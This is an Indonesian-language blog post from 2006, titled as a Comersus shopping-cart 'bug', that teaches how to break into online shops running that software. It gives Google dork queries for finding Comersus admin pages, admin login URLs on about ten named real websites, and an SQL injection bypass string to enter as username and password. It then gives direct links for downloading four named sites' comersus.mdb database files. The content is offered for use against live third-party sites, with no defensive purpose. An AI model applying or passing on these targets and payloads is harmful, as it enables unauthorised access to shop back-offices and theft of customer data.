Bug Comersus
Google dork:
allinurl:"Powered by COmersus"
allinurl:/shopdisplaycategories.asp
allinurl:/comersus_backoffice_login.php
allinurl:/backoffice/
allinurl:/backofficegold/
allinurl:/comersus_contactUs.asp
contoh letak login adminnya:
http://www.oldworldgourmet.com/cart/backofficegold/
http://www.centrodemateriales.com/admin/
http://www.swaminarayansatsang.com/shopping1/backoffice+/
http://www.mapsoft.co.yu/dev/comersus/backofficelite/
http://www.tarkentonsports.com/Comersus/backofficelite/
http://www.hugoo.com/backofficegold/
http://www.pronethost.com/shop//backofficelite/
http://www.workingproducts.com/cgi-bin/wp/backofficelite/
http://www.futuresknowledge.com/comersus/backofficelite
http://www.sheardelight.net/backofficegold/
Untuk login diatas anda dapat melakukan sql injection seperti di bawah ini:
http://www.sheardelight.net/backofficegold/
login : ' OR adminname <> '' OR adminname = '
pass : ' OR adminname <> '' OR adminname = '
Jika tidak bisa di injection maka anda bisa mendownload databasenya disini
contoh letak databasenya:
http://latintradingbooks.com/comersus/database/comersus.mdb
http://www.braziliancd.com/Comersus/database/comersus.mdb
http://www.sidewindercycle.com/database/comersus.mdb
http://www.sillyprat.co.uk/shop/database/comersus.mdb
Wednesday, July 12, 2006
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment